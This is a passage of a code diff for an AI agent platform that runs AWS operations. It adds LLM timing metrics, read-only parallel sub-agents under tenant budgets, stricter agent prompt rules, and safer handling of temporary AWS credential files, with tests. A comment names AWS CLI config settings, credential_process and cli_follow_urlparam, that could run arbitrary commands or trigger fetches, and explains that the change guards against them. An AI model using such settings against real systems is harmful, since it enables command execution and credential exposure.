-    async function reflectNode(state: ReflectionState): Promise<Partial<ReflectionState>> {
+    async function reflectNode(state: ReflectionState, runtimeConfig?: any): Promise<Partial<ReflectionState>> {
         const { messages, taskDescription, iterationCount, plan, toolResults, memoryContext } = state;
 
         console.log(`\n================================================================================`);
@@ -646,6 +651,8 @@ ${plan.map((s, i) => `${i + 1}. [${s.status}] ${s.step}`).join('\n')}`
         try {
             response = await reflectorModel.invoke(_auditInputs_ref);
             llmAuditLog('REFLECTOR', _auditInputs_ref, response, _auditStart_ref);
+            recordNodeTiming(runtimeConfig?.configurable?.thread_id, 'REFLECTOR', Date.now() - _auditStart_ref,
+                (response as any).usage_metadata?.input_tokens ?? 0, (response as any).usage_metadata?.output_tokens ?? 0);
         } catch (err: any) {
             // If the reflector fails (throttle, context overflow, parse-impossible), treat the
             // work as complete and force finalization rather than aborting the whole run.
@@ -770,6 +777,8 @@ ${accountContext}`);
         try {
             response = await modelWithTools.invoke(_auditInputs_rev) as AIMessage;
             llmAuditLog('REVISER', _auditInputs_rev, response, _auditStart_rev);
+            recordNodeTiming(runtimeConfig?.configurable?.thread_id, 'REVISER', Date.now() - _auditStart_rev,
+                (response as any).usage_metadata?.input_tokens ?? 0, (response as any).usage_metadata?.output_tokens ?? 0);
         } catch (err: any) {
             // Provider error while revising: emit a text note (no tool calls) so the graph
             // routes back to reflection and can finalize instead of aborting.
@@ -804,7 +813,7 @@ ${accountContext}`);
     // ---------------------------------------------------------------------------
     // FINAL OUTPUT NODE
     // ---------------------------------------------------------------------------
-    async function finalNode(state: ReflectionState): Promise<Partial<ReflectionState>> {
+    async function finalNode(state: ReflectionState, runtimeConfig?: any): Promise<Partial<ReflectionState>> {
         const { taskDescription, toolResults } = state;
 
         console.log(`\n================================================================================`);
@@ -869,6 +878,8 @@ ${groundingRule}`);
         try {
             const summaryResponse = await model.invoke(_auditInputs_fin);
             llmAuditLog('FINAL', _auditInputs_fin, summaryResponse, _auditStart_fin);
+            recordNodeTiming(runtimeConfig?.configurable?.thread_id, 'FINAL', Date.now() - _auditStart_fin,
+                (summaryResponse as any).usage_metadata?.input_tokens ?? 0, (summaryResponse as any).usage_metadata?.output_tokens ?? 0);
             summaryContent = contentToText(summaryResponse.content);
         } catch (err: any) {
             // A finalize failure must never crash the run — assemble a best-effort answer

--- a/apps/web-ui/lib/agent/planning-agent.ts
+++ b/apps/web-ui/lib/agent/planning-agent.ts
@@ -37,6 +37,10 @@ import { prepareContext, buildWorkingMemorySection, estimateTokens } from "./mem
 import { createGuardNode } from "./guard";
 import { routeAfterGuard } from "./gate-routing";
 import { recordNodeTiming } from "./run-timings";
+import { resolveSubagentBudget } from "./subagent-budget";
+import { createRunBudgetLedger, createDispatchAgentTool } from "./dispatch-agent-tool";
+import { filterReadOnlyTools } from "./subagent";
+import { createAwsReadTool } from "./aws-read-tool";
 
 const PLAN_STATUSES = new Set<PlanStep['status']>(['completed', 'in_progress', 'pending', 'failed']);
 
@@ -224,7 +228,32 @@ export async function createReflectionGraph(config: GraphConfig) {
 
     // --- Tool Assembly ---
     // Memory tools excluded — memory_recall and memory_save graph nodes handle memory deterministically
-    const tools = await assembleTools({ includeS3Tools: true, includeMemoryTools: false, includeSkillTool: autoLoadSkills, userId: config.userId, mcpServerIds, tenantId, accounts, knowledgeBaseIds: config.knowledgeBaseIds });
+    // Sub-agent tools are assembled FIRST and without dispatch_agent, so the
+    // sub-agents' tool list can never contain the tool that spawns sub-agents.
+    const baseTools = await assembleTools({ includeS3Tools: true, includeMemoryTools: false, includeSkillTool: autoLoadSkills, userId: config.userId, mcpServerIds, tenantId, accounts, knowledgeBaseIds: config.knowledgeBaseIds });
+
+    const subagentBudget = tenantId
+        ? await resolveSubagentBudget(tenantId)
+        : { enabled: false, maxConcurrentSubagents: 1, maxSubagentsPerRun: 1, maxSubagentTokensPerRun: 0, subagentMaxIterations: 2, subagentTimeoutMs: 30_000 };
+
+    const dispatchAgentTool = subagentBudget.enabled
+        ? createDispatchAgentTool({
+            model,
+            // Sub-agents have NO shell (Task 7 Step 6). aws_read is their only
+            // route to AWS; it builds argv and runs execFile with shell: false.
+            // createAwsReadTool's return type is a DynamicStructuredTool whose
+            // `invoke` is generically typed over its own zod schema; it satisfies
+            // the runtime SubagentToolLike shape (name + invoke(args)) but not
+            // structurally, hence the cast.
+            subagentTools: [...filterReadOnlyTools(baseTools as never[]), createAwsReadTool(tenantId!, config.userId) as never],
+            ledger: createRunBudgetLedger(subagentBudget),
+            budget: subagentBudget,
+            onSubagentEvent: config.onSubagentEvent,
+        })
+        : null;
+
+    const tools = dispatchAgentTool ? [...baseTools, dispatchAgentTool] : baseTools;
+    console.log(`[PlanningAgent] Sub-agents ${subagentBudget.enabled ? `enabled (concurrency=${subagentBudget.maxConcurrentSubagents})` : 'disabled'}`);
     const modelWithTools = model.bindTools!(tools);
     const toolNode = new ToolNode(tools);
 
@@ -411,6 +440,13 @@ ${accountContext}
 - If a tool call returns an error, capture the full error message and diagnose it; do not silently suppress it.
 - If the current step is a simple question or greeting that requires no tools, answer directly and concisely.
 - If the current step has nothing to execute (empty inventory, prerequisite returned no data), move on silently — NEVER run echo or other no-op commands just to mark a step done, and never write an explanation of why there was nothing to do.
+
+## Delegation
+
+- When the current step splits into INDEPENDENT investigations — one per account, region, or service — emit several dispatch_agent calls in THIS turn. They run in parallel and each returns a compressed report.
+- Write each sub-agent brief so it stands completely alone: it sees none of this conversation, so spell out account ids, regions, time windows, and what the report must contain.
+- Do NOT delegate work that changes state — sub-agents are read-only. Do NOT delegate a single quick lookup. Do NOT chain sub-agents; they cannot see each other's results.
+- If dispatch_agent replies that the budget is exhausted, simply do that work yourself with your own tools.
 
 ## Narration Discipline (critical)
 

--- a/apps/web-ui/lib/agent/prompt-templates.ts
+++ b/apps/web-ui/lib/agent/prompt-templates.ts
@@ -43,6 +43,12 @@ export const CORE_PRINCIPLES = `
 3. **Be specific** — include resource IDs, account names, regions, and numeric values in every response.
 4. **Fail forward** — if a command fails, capture the full error, diagnose root cause, and attempt a corrective action. Never silently skip.
 5. **Lead with action** — respond with the finding or first action, not a restatement of the question.
+
+## Resource Utilization Mandate (applies to every step, non-negotiable)
+6. **Load the matching skill FIRST.** If a skill catalog is listed in this prompt and any skill's description covers the task — or a phase of it — call load_skill with that id BEFORE doing the work, then follow the loaded instructions. Doing skill-covered work unaided while the matching skill sits unloaded is an error, not a style choice.
+7. **Ground every step in recalled memory.** When a memory section (known facts, operating rules, past experience) is present, it is DATA, not decoration: reuse its identifiers, baselines, and prior findings; apply its rules; and when live data contradicts a recalled fact, verify with a live query and state which one is current. Never produce a conclusion that silently ignores a recalled fact that bears on it.
+8. **Knowledge base before "not found".** Before answering that information is unavailable, unknown, or undocumented — or guessing at tenant-specific context (naming conventions, runbooks, board/project mappings, architecture) — call search_knowledge_base if it is available. "I couldn't find it" is only a valid answer AFTER the knowledge base has been searched.
+9. **Pick the purpose-built tool at every decision.** Survey ALL tools available in this run — MCP integrations, structured AWS tools, skills, knowledge base, memory — and use the one built for the job instead of improvising. If an MCP integration covers the target system (Jira, Slack, GitHub, …), use it; never scavenge the filesystem or environment for credentials, and never declare a system unreachable while its tool sits unused.
 `;
 
 // ---------------------------------------------------------------------------

--- a/apps/web-ui/lib/agent/run-timings.test.ts
+++ b/apps/web-ui/lib/agent/run-timings.test.ts
@@ -40,4 +40,31 @@ describe('run timings', () => {
     it('returns null for an unknown thread', () => {
         expect(summarizeRun('never-seen')).toBeNull();
     });
+
+    it('does not evict a run that is still recording', () => {
+        // The eviction backstop must target the most IDLE run, not the
+        // oldest-started one. A 10-minute agent run is exactly the run whose
+        // numbers matter most, and it is also the one that has been in the map
+        // longest — evicting it would silently discard the measurement.
+        recordNodeTiming('long-runner', 'EXECUTOR', 1000, 10, 10);
+
+        // Fill past capacity with other threads, while the long runner keeps working.
+        for (let i = 0; i < 250; i++) {
+            recordNodeTiming(`other-${i}`, 'EXECUTOR', 1, 1, 1);
+            recordNodeTiming('long-runner', 'EXECUTOR', 1000, 10, 10);
+        }
+
+        const summary = summarizeRun('long-runner');
+        expect(summary).not.toBeNull();
+        expect(summary!.byNode.EXECUTOR.calls).toBe(251);
+    });
+
+    it('still bounds the map when runs never reach teardown', () => {
+        for (let i = 0; i < 300; i++) {
+            recordNodeTiming(`abandoned-${i}`, 'EXECUTOR', 1, 1, 1);
+        }
+        // The earliest abandoned runs must have been evicted.
+        expect(summarizeRun('abandoned-0')).toBeNull();
+        expect(summarizeRun('abandoned-299')).not.toBeNull();
+    });
 });

--- a/apps/web-ui/lib/agent/run-timings.test.ts
+++ b/apps/web-ui/lib/agent/run-timings.test.ts
@@ -1,0 +1,43 @@
+import { describe, it, expect, beforeEach } from 'vitest';
+import { recordNodeTiming, summarizeRun, logRunSummary, __resetRunTimingsForTests } from './run-timings';
+
+beforeEach(() => __resetRunTimingsForTests());
+
+describe('run timings', () => {
+    it('aggregates calls per node', () => {
+        recordNodeTiming('t1', 'EXECUTOR', 1000, 500, 100);
+        recordNodeTiming('t1', 'EXECUTOR', 2000, 600, 150);
+        recordNodeTiming('t1', 'REFLECTOR', 500, 200, 50);
+
+        const summary = summarizeRun('t1')!;
+
+        expect(summary.totalLlmMs).toBe(3500);
+        expect(summary.totalTokensIn).toBe(1300);
+        expect(summary.totalTokensOut).toBe(300);
+        expect(summary.byNode.EXECUTOR).toEqual({ calls: 2, ms: 3000, tokensIn: 1100, tokensOut: 250 });
+        expect(summary.byNode.REFLECTOR.calls).toBe(1);
+    });
+
+    it('keeps runs isolated by threadId', () => {
+        recordNodeTiming('t1', 'EXECUTOR', 1000, 10, 10);
+        recordNodeTiming('t2', 'EXECUTOR', 5000, 20, 20);
+
+        expect(summarizeRun('t1')!.totalLlmMs).toBe(1000);
+        expect(summarizeRun('t2')!.totalLlmMs).toBe(5000);
+    });
+
+    it('ignores calls with no threadId rather than throwing', () => {
+        expect(() => recordNodeTiming(undefined, 'EXECUTOR', 100, 1, 1)).not.toThrow();
+        expect(summarizeRun('t1')).toBeNull();
+    });
+
+    it('discards the run after logging its summary', () => {
+        recordNodeTiming('t1', 'EXECUTOR', 100, 1, 1);
+        logRunSummary('t1');
+        expect(summarizeRun('t1')).toBeNull();
+    });
+
+    it('returns null for an unknown thread', () => {
+        expect(summarizeRun('never-seen')).toBeNull();
+    });
+});

--- a/apps/web-ui/lib/agent/run-timings.ts
+++ b/apps/web-ui/lib/agent/run-timings.ts
@@ -46,8 +46,14 @@ export function recordNodeTiming(
             if (oldest !== undefined) runs.delete(oldest);
         }
         byNode = {};
-        runs.set(threadId, byNode);
+    } else {
+        // Refresh position: Map keeps INSERTION order, and .set() on an
+        // existing key does not move it. Without this, eviction targets the
+        // oldest-STARTED run — which is exactly the long run we most want to
+        // measure. Delete-then-set makes it least-recently-ACTIVE.
+        runs.delete(threadId);
     }
+    runs.set(threadId, byNode);
 
     const entry = byNode[node] ?? { calls: 0, ms: 0, tokensIn: 0, tokensOut: 0 };
     entry.calls += 1;

--- a/apps/web-ui/lib/agent/run-timings.ts
+++ b/apps/web-ui/lib/agent/run-timings.ts
@@ -1,0 +1,96 @@
+/**
+ * Per-run LLM timing accumulator.
+ *
+ * llmAuditLog already measures latency and tokens for every model call, but
+ * throws the numbers away unless LLM_AUDIT is enabled. This module keeps a
+ * lightweight always-on aggregate so a run's wall time can be attributed to
+ * specific graph nodes — the baseline needed to tell whether parallelism
+ * actually helped.
+ *
+ * Keyed by threadId because runs are concurrent within one process.
+ */
+
+export interface NodeTiming {
+    calls: number;
+    ms: number;
+    tokensIn: number;
+    tokensOut: number;
+}
+
+export interface RunTimingSummary {
+    totalLlmMs: number;
+    totalTokensIn: number;
+    totalTokensOut: number;
+    byNode: Record<string, NodeTiming>;
+}
+
+/** Backstop against unbounded growth if a run never reaches its teardown. */
+const MAX_TRACKED_RUNS = 200;
+
+const runs = new Map<string, Record<string, NodeTiming>>();
+
+export function recordNodeTiming(
+    threadId: string | undefined,
+    node: string,
+    latencyMs: number,
+    tokensIn: number,
+    tokensOut: number,
+): void {
+    if (!threadId) return;
+
+    let byNode = runs.get(threadId);
+    if (!byNode) {
+        if (runs.size >= MAX_TRACKED_RUNS) {
+            // Evict the oldest insertion — Map preserves insertion order.
+            const oldest = runs.keys().next().value;
+            if (oldest !== undefined) runs.delete(oldest);
+        }
+        byNode = {};
+        runs.set(threadId, byNode);
+    }
+
+    const entry = byNode[node] ?? { calls: 0, ms: 0, tokensIn: 0, tokensOut: 0 };
+    entry.calls += 1;
+    entry.ms += latencyMs;
+    entry.tokensIn += tokensIn;
+    entry.tokensOut += tokensOut;
+    byNode[node] = entry;
+}
+
+export function summarizeRun(threadId: string): RunTimingSummary | null {
+    const byNode = runs.get(threadId);
+    if (!byNode) return null;
+
+    let totalLlmMs = 0;
+    let totalTokensIn = 0;
+    let totalTokensOut = 0;
+    for (const entry of Object.values(byNode)) {
+        totalLlmMs += entry.ms;
+        totalTokensIn += entry.tokensIn;
+        totalTokensOut += entry.tokensOut;
+    }
+
+    return { totalLlmMs, totalTokensIn, totalTokensOut, byNode };
+}
+
+export function logRunSummary(threadId: string): void {
+    const summary = summarizeRun(threadId);
+    runs.delete(threadId);
+    if (!summary) return;
+
+    const rows = Object.entries(summary.byNode)
+        .sort((a, b) => b[1].ms - a[1].ms)
+        .map(([node, t]) =>
+            `   ${node.padEnd(12)} calls=${String(t.calls).padStart(3)}  llm=${(t.ms / 1000).toFixed(1)}s  in=${t.tokensIn}  out=${t.tokensOut}`);
+
+    console.log(
+        `\n📊 [RUN SUMMARY] thread=${threadId}\n` +
+        `   TOTAL        llm=${(summary.totalLlmMs / 1000).toFixed(1)}s  in=${summary.totalTokensIn}  out=${summary.totalTokensOut}\n` +
+        rows.join('\n'),
+    );
+}
+
+/** Test seam. */
+export function __resetRunTimingsForTests(): void {
+    runs.clear();
+}

--- a/apps/web-ui/lib/agent/session-manager.test.ts
+++ b/apps/web-ui/lib/agent/session-manager.test.ts
@@ -1,0 +1,91 @@
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
+import * as fs from 'fs/promises';
+import * as os from 'os';
+import * as path from 'path';
+
+import {
+    createSessionProfile,
+    getOrCreateSessionProfile,
+    getTenantCredentialsFilePath,
+    __resetProfileCacheForTests,
+} from './session-manager';
+
+const TENANT = 'tenant-concurrency-test';
+
+function creds(region = 'us-east-1') {
+    return {
+        accessKeyId: 'AKIAEXAMPLE',
+        secretAccessKey: 'secret',
+        sessionToken: 'token',
+        region,
+    };
+}
+
+beforeEach(() => {
+    __resetProfileCacheForTests();
+});
+
+afterEach(async () => {
+    await fs.rm(path.dirname(getTenantCredentialsFilePath(TENANT)), { recursive: true, force: true });
+});
+
+describe('createSessionProfile concurrency', () => {
+    it('keeps every profile when 10 callers write at the same time', async () => {
+        const accountIds = Array.from({ length: 10 }, (_, i) => `10000000000${i}`);
+
+        const profiles = await Promise.all(
+            accountIds.map(id => createSessionProfile(id, creds(), TENANT)),
+        );
+
+        const contents = await fs.readFile(getTenantCredentialsFilePath(TENANT), 'utf-8');
+        for (const profile of profiles) {
+            expect(contents).toContain(`[${profile.profileName}]`);
+        }
+    });
+
+    it('writes the credentials file atomically (no partial content observed)', async () => {
+        await createSessionProfile('222222222222', creds(), TENANT);
+        const filePath = getTenantCredentialsFilePath(TENANT);
+        const stat = await fs.stat(filePath);
+        expect(stat.mode & 0o777).toBe(0o600);
+
+        const dir = path.dirname(filePath);
+        const leftovers = (await fs.readdir(dir)).filter(f => f.endsWith('.tmp'));
+        expect(leftovers).toEqual([]);
+    });
+});
+
+describe('getOrCreateSessionProfile caching', () => {
+    it('reuses a fresh profile instead of assuming again', async () => {
+        const assume = vi.fn().mockResolvedValue(creds());
+
+        const first = await getOrCreateSessionProfile('333333333333', TENANT, assume);
+        const second = await getOrCreateSessionProfile('333333333333', TENANT, assume);
+
+        expect(assume).toHaveBeenCalledTimes(1);
+        expect(second.profileName).toBe(first.profileName);
+    });
+
+    it('re-assumes when the cached profile is near expiry', async () => {
+        const assume = vi.fn().mockResolvedValue(creds());
+
+        const first = await getOrCreateSessionProfile('444444444444', TENANT, assume);
+        // Force the cached entry to be 30s from expiry — inside the 120s refresh margin.
+        first.expiresAt = new Date(Date.now() + 30_000);
+
+        const second = await getOrCreateSessionProfile('444444444444', TENANT, assume);
+
+        expect(assume).toHaveBeenCalledTimes(2);
+        expect(second.profileName).not.toBe(first.profileName);
+    });
+
+    it('scopes the cache by tenant', async () => {
+        const assume = vi.fn().mockResolvedValue(creds());
+
+        await getOrCreateSessionProfile('555555555555', TENANT, assume);
+        await getOrCreateSessionProfile('555555555555', `${TENANT}-other`, assume);
+
+        expect(assume).toHaveBeenCalledTimes(2);
+        await fs.rm(path.dirname(getTenantCredentialsFilePath(`${TENANT}-other`)), { recursive: true, force: true });
+    });
+});

--- a/apps/web-ui/lib/agent/session-manager.test.ts
+++ b/apps/web-ui/lib/agent/session-manager.test.ts
@@ -53,6 +53,22 @@ describe('createSessionProfile concurrency', () => {
         const leftovers = (await fs.readdir(dir)).filter(f => f.endsWith('.tmp'));
         expect(leftovers).toEqual([]);
     });
+
+    it('gives every profile a unique name even within the same millisecond', async () => {
+        // 50 back-to-back creations for ONE account will land many in the same ms.
+        const profiles = await Promise.all(
+            Array.from({ length: 50 }, () => createSessionProfile('999999999999', creds(), TENANT)),
+        );
+
+        const names = new Set(profiles.map(p => p.profileName));
+        expect(names.size).toBe(50);
+
+        // And every one of them must actually be present in the file.
+        const contents = await fs.readFile(getTenantCredentialsFilePath(TENANT), 'utf-8');
+        for (const name of names) {
+            expect(contents).toContain(`[${name}]`);
+        }
+    });
 });
 
 describe('getOrCreateSessionProfile caching', () => {

--- a/apps/web-ui/lib/agent/session-manager.ts
+++ b/apps/web-ui/lib/agent/session-manager.ts
@@ -1,6 +1,7 @@
 import * as fs from 'fs/promises';
 import * as path from 'path';
 import * as os from 'os';
+import { randomUUID } from 'crypto';
 
 /**
  * AWS Session Profile Manager
@@ -53,6 +54,30 @@ const TENANT_CREDS_ROOT = path.join(os.tmpdir(), 'nucleus-aws-creds');
 const PROFILE_PREFIX = 'nucleus_agent_';
 
 /**
+ * Serializes read-modify-write cycles per credentials file.
+ *
+ * Node is single-threaded, but `await` between the read and the write yields the
+ * event loop: two concurrent callers both read the old content and the second
+ * write clobbers the first caller's profile. The victim then runs
+ * `aws --profile <name>` against a profile that is not in the file and gets
+ * "The config profile could not be found". Chaining every mutation onto a
+ * per-path promise removes the interleaving window.
+ *
+ * The map is keyed by resolved file path, so the legacy shared-file path is
+ * covered too. Key count is bounded by tenant count, so it is not a leak.
+ */
+const fileLocks = new Map<string, Promise<unknown>>();
+
+function withFileLock<T>(filePath: string, fn: () => Promise<T>): Promise<T> {
+    const previous = fileLocks.get(filePath) ?? Promise.resolve();
+    // Run `fn` whether the predecessor resolved or rejected — one caller's
+    // failure must not deadlock every later caller on the same file.
+    const next = previous.then(fn, fn);
+    fileLocks.set(filePath, next.catch(() => undefined));
+    return next;
+}
+
+/**
  * Resolve the absolute credentials-file path for a tenant.
  * Deterministic so execute_command (which only has the tenantId) can point
  * AWS_SHARED_CREDENTIALS_FILE at the same file this module writes to.
@@ -90,7 +115,17 @@ async function readCredentialsFile(filePath: string): Promise<string> {
 async function writeCredentialsFile(filePath: string, content: string): Promise<void> {
     const dir = path.dirname(filePath);
     await fs.mkdir(dir, { recursive: true });
-    await fs.writeFile(filePath, content, { mode: 0o600 });
+    // Write-then-rename: a concurrent reader (the AWS CLI) never observes a
+    // half-written credentials file. The temp file is created in the same
+    // directory so the rename stays on one filesystem and is therefore atomic.
+    const tmpPath = path.join(dir, `.credentials.${process.pid}.${randomUUID()}.tmp`);
+    try {
+        await fs.writeFile(tmpPath, content, { mode: 0o600 });
+        await fs.rename(tmpPath, filePath);
+    } catch (error) {
+        await fs.rm(tmpPath, { force: true }).catch(() => undefined);
+        throw error;
+    }
 }
 
 /**
@@ -156,20 +191,19 @@ export async function createSessionProfile(
         credentialsFile,
     };
 
-    // Read current credentials file
-    const content = await readCredentialsFile(credentialsFile);
-    const profiles = parseCredentialsFile(content);
+    await withFileLock(credentialsFile, async () => {
+        const content = await readCredentialsFile(credentialsFile);
+        const profiles = parseCredentialsFile(content);
 
-    // Add new profile
-    const profileCreds = new Map<string, string>();
-    profileCreds.set('aws_access_key_id', credentials.accessKeyId);
-    profileCreds.set('aws_secret_access_key', credentials.secretAccessKey);
-    profileCreds.set('aws_session_token', credentials.sessionToken);
-    profileCreds.set('region', credentials.region);
-    profiles.set(profileName, profileCreds);
+        const profileCreds = new Map<string, string>();
+        profileCreds.set('aws_access_key_id', credentials.accessKeyId);
+        profileCreds.set('aws_secret_access_key', credentials.secretAccessKey);
+        profileCreds.set('aws_session_token', credentials.sessionToken);
+        profileCreds.set('region', credentials.region);
+        profiles.set(profileName, profileCreds);
 
-    // Write back to file
-    await writeCredentialsFile(credentialsFile, serializeCredentialsFile(profiles));
+        await writeCredentialsFile(credentialsFile, serializeCredentialsFile(profiles));
+    });
 
     console.log(`[SessionManager] Created profile: ${profileName} in ${credentialsFile}`);
 
@@ -227,6 +261,52 @@ export async function cleanupAllAgentProfiles(): Promise<void> {
     } catch (error) {
         console.error('[SessionManager] Error during cleanup:', error);
     }
+}
+
+/**
+ * Re-assume when a cached profile has less than this much life left. STS
+ * credentials here last 900s (see assumeRoleForAccount); handing back a profile
+ * with 10s remaining guarantees the next AWS CLI call fails mid-flight.
+ */
+const PROFILE_REFRESH_MARGIN_MS = 120_000;
+
+const profileCache = new Map<string, SessionProfile>();
+
+function profileCacheKey(tenantId: string, accountId: string): string {
+    return `${tenantId}:${accountId}`;
+}
+
+/**
+ * Return a usable session profile for (tenant, account), assuming fresh
+ * credentials only when there is no cached profile or the cached one is within
+ * PROFILE_REFRESH_MARGIN_MS of expiry.
+ *
+ * Fan-out makes this matter twice over: N sub-agents auditing the same account
+ * previously triggered N AssumeRole calls, and a long run could hand out a
+ * profile that expired before it was used.
+ */
+export async function getOrCreateSessionProfile(
+    accountId: string,
+    tenantId: string,
+    assume: () => Promise<AwsCredentials>,
+): Promise<SessionProfile> {
+    const key = profileCacheKey(tenantId, accountId);
+    const cached = profileCache.get(key);
+    if (cached && cached.expiresAt.getTime() - Date.now() > PROFILE_REFRESH_MARGIN_MS) {
+        console.log(`[SessionManager] Reusing cached profile ${cached.profileName} for ${key}`);
+        return cached;
+    }
+
+    const credentials = await assume();
+    const profile = await createSessionProfile(accountId, credentials, tenantId);
+    profileCache.set(key, profile);
+    return profile;
+}
+
+/** Test seam — clears the in-process profile cache between test cases. */
+export function __resetProfileCacheForTests(): void {
+    profileCache.clear();
+    fileLocks.clear();
 }
 
 // Run cleanup on module load (server startup)

--- a/apps/web-ui/lib/agent/session-manager.ts
+++ b/apps/web-ui/lib/agent/session-manager.ts
@@ -88,6 +88,19 @@ export function getTenantCredentialsFilePath(tenantId: string): string {
 }
 
 /**
+ * Resolve the absolute CLI-config path for a tenant. Nothing writes this file; it
+ * exists so buildCommandEnv can PIN AWS_CONFIG_FILE at a path we own instead of
+ * letting the child inherit an ambient ~/.aws/config, which could set
+ * `cli_follow_urlparam` (turning http:// parameter values into fetches),
+ * `credential_process` (arbitrary command execution on profile resolution) or
+ * `sso_*`. A missing config file is not an error for the AWS CLI.
+ */
+export function getTenantConfigFilePath(tenantId: string): string {
+    const sanitized = tenantId.replace(/[^a-zA-Z0-9_-]/g, '_') || 'default';
+    return path.join(TENANT_CREDS_ROOT, sanitized, 'config');
+}
+
+/**
  * Generate a unique profile name
  */
 function generateProfileName(accountId: string): string {

--- a/apps/web-ui/lib/agent/session-manager.ts
+++ b/apps/web-ui/lib/agent/session-manager.ts
@@ -91,8 +91,11 @@ export function getTenantCredentialsFilePath(tenantId: string): string {
  * Generate a unique profile name
  */
 function generateProfileName(accountId: string): string {
-    const timestamp = Date.now();
-    return `${PROFILE_PREFIX}${accountId}_${timestamp}`;
+    // Date.now() alone collides when two profiles for one account are created in
+    // the same millisecond — which parallel get_aws_credentials calls do routinely.
+    // A colliding name means the second profile overwrites the first's section and
+    // the first caller's handle silently points at someone else's credentials.
+    return `${PROFILE_PREFIX}${accountId}_${Date.now()}_${randomUUID().slice(0, 8)}`;
 }
 
 /**

--- a/apps/web-ui/lib/agent/skill-tool.ts
+++ b/apps/web-ui/lib/agent/skill-tool.ts
@@ -28,7 +28,7 @@ export function createLoadSkillTool(tenantId: string) {
         {
             name: 'load_skill',
             description:
-                'Load the full instructions of a specialized skill by its id. The available skills are listed in your system prompt under "Available Skills". Call this BEFORE starting work that a skill\'s description covers — the loaded instructions define privileges, safety rules, and workflow for that scope. You may load multiple skills over the course of one task as different phases require them. Do not call it for skills already loaded in this conversation.',
+                'Load the full instructions of a specialized skill by its id. The available skills are listed in your system prompt under "Available Skills". Calling this is MANDATORY, not optional: whenever a listed skill\'s description covers the work you are about to do (match on domain — cost, EC2, Jira, security, … — not exact wording), load it BEFORE doing that work. The loaded instructions define privileges, safety rules, and workflow for that scope; doing skill-covered work without loading the skill is an error. You may load multiple skills over one task as different phases require them. Do not call it for skills already loaded in this conversation.',
             schema: z.object({
                 skill_id: z.string().describe('The skill id (slug) exactly as listed in the Available Skills catalog'),
             }),

--- a/apps/web-ui/lib/agent/subagent-budget.test.ts
+++ b/apps/web-ui/lib/agent/subagent-budget.test.ts
@@ -63,6 +63,15 @@ describe('clampBudget', () => {
         process.env.SUBAGENT_MAX_CONCURRENCY = '2';
         expect(clampBudget({ maxConcurrentSubagents: 6 }).maxConcurrentSubagents).toBe(2);
     });
+
+    it('IGNORES an env ceiling above the built-in max', () => {
+        // The load-bearing multi-tenant isolation invariant: web-ui is a shared
+        // ECS task, so no operator misconfiguration may let a tenant exceed the
+        // hard cap and saturate the box for co-tenants.
+        process.env.SUBAGENT_MAX_CONCURRENCY = '100';
+        expect(clampBudget({ maxConcurrentSubagents: 100 }).maxConcurrentSubagents)
+            .toBe(BUDGET_BOUNDS.maxConcurrentSubagents.max);
+    });
 });
 
 describe('resolveSubagentBudget', () => {
@@ -112,6 +121,17 @@ describe('validateBudgetInput', () => {
 
     it('rejects an out-of-range number with a message naming the field', () => {
         expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: 999 }))
+            .toMatch(/maxConcurrentSubagents/);
+    });
+
+    it('rejects non-number types rather than coercing them', () => {
+        // This function guards the PUT /api/settings/aiops trust boundary, so it
+        // must not accept `true` as 1 or "3" as 3.
+        expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: true }))
+            .toMatch(/maxConcurrentSubagents/);
+        expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: '3' }))
+            .toMatch(/maxConcurrentSubagents/);
+        expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: null }))
             .toMatch(/maxConcurrentSubagents/);
     });
 });

--- a/apps/web-ui/lib/agent/subagent-budget.test.ts
+++ b/apps/web-ui/lib/agent/subagent-budget.test.ts
@@ -23,9 +23,11 @@ afterEach(() => {
 });
 
 describe('platformSubagentsEnabled', () => {
-    it('is false unless SUBAGENTS_ENABLED is exactly "true"', () => {
+    // The feature is UI-driven: no env var is required to turn it on. The env
+    // var survives only as an emergency deployment-wide OFF.
+    it('is true by default and false only when SUBAGENTS_ENABLED is exactly "false"', () => {
         delete process.env.SUBAGENTS_ENABLED;
-        expect(platformSubagentsEnabled()).toBe(false);
+        expect(platformSubagentsEnabled()).toBe(true);
         process.env.SUBAGENTS_ENABLED = 'false';
         expect(platformSubagentsEnabled()).toBe(false);
         process.env.SUBAGENTS_ENABLED = 'true';

--- a/apps/web-ui/lib/agent/subagent-budget.test.ts
+++ b/apps/web-ui/lib/agent/subagent-budget.test.ts
@@ -1,0 +1,117 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+
+vi.mock('@/lib/tenant-config-service', () => ({
+    TenantConfigService: { getConfig: vi.fn() },
+}));
+
+import { TenantConfigService } from '@/lib/tenant-config-service';
+import {
+    clampBudget,
+    resolveSubagentBudget,
+    validateBudgetInput,
+    platformSubagentsEnabled,
+    BUDGET_BOUNDS,
+} from './subagent-budget';
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    process.env.SUBAGENTS_ENABLED = 'true';
+});
+afterEach(() => {
+    delete process.env.SUBAGENTS_ENABLED;
+    delete process.env.SUBAGENT_MAX_CONCURRENCY;
+});
+
+describe('platformSubagentsEnabled', () => {
+    it('is false unless SUBAGENTS_ENABLED is exactly "true"', () => {
+        delete process.env.SUBAGENTS_ENABLED;
+        expect(platformSubagentsEnabled()).toBe(false);
+        process.env.SUBAGENTS_ENABLED = 'false';
+        expect(platformSubagentsEnabled()).toBe(false);
+        process.env.SUBAGENTS_ENABLED = 'true';
+        expect(platformSubagentsEnabled()).toBe(true);
+    });
+});
+
+describe('clampBudget', () => {
+    it('returns defaults for null input', () => {
+        const budget = clampBudget(null);
+        expect(budget.maxConcurrentSubagents).toBe(BUDGET_BOUNDS.maxConcurrentSubagents.default);
+        expect(budget.enabled).toBe(false);
+    });
+
+    it('clamps a value above the ceiling down', () => {
+        expect(clampBudget({ maxConcurrentSubagents: 50 }).maxConcurrentSubagents)
+            .toBe(BUDGET_BOUNDS.maxConcurrentSubagents.max);
+    });
+
+    it('clamps a value below the floor up', () => {
+        expect(clampBudget({ maxSubagentsPerRun: 0 }).maxSubagentsPerRun)
+            .toBe(BUDGET_BOUNDS.maxSubagentsPerRun.min);
+    });
+
+    it('rounds non-integers', () => {
+        expect(clampBudget({ subagentMaxIterations: 7.6 }).subagentMaxIterations).toBe(8);
+    });
+
+    it('falls back to the default for non-numeric values', () => {
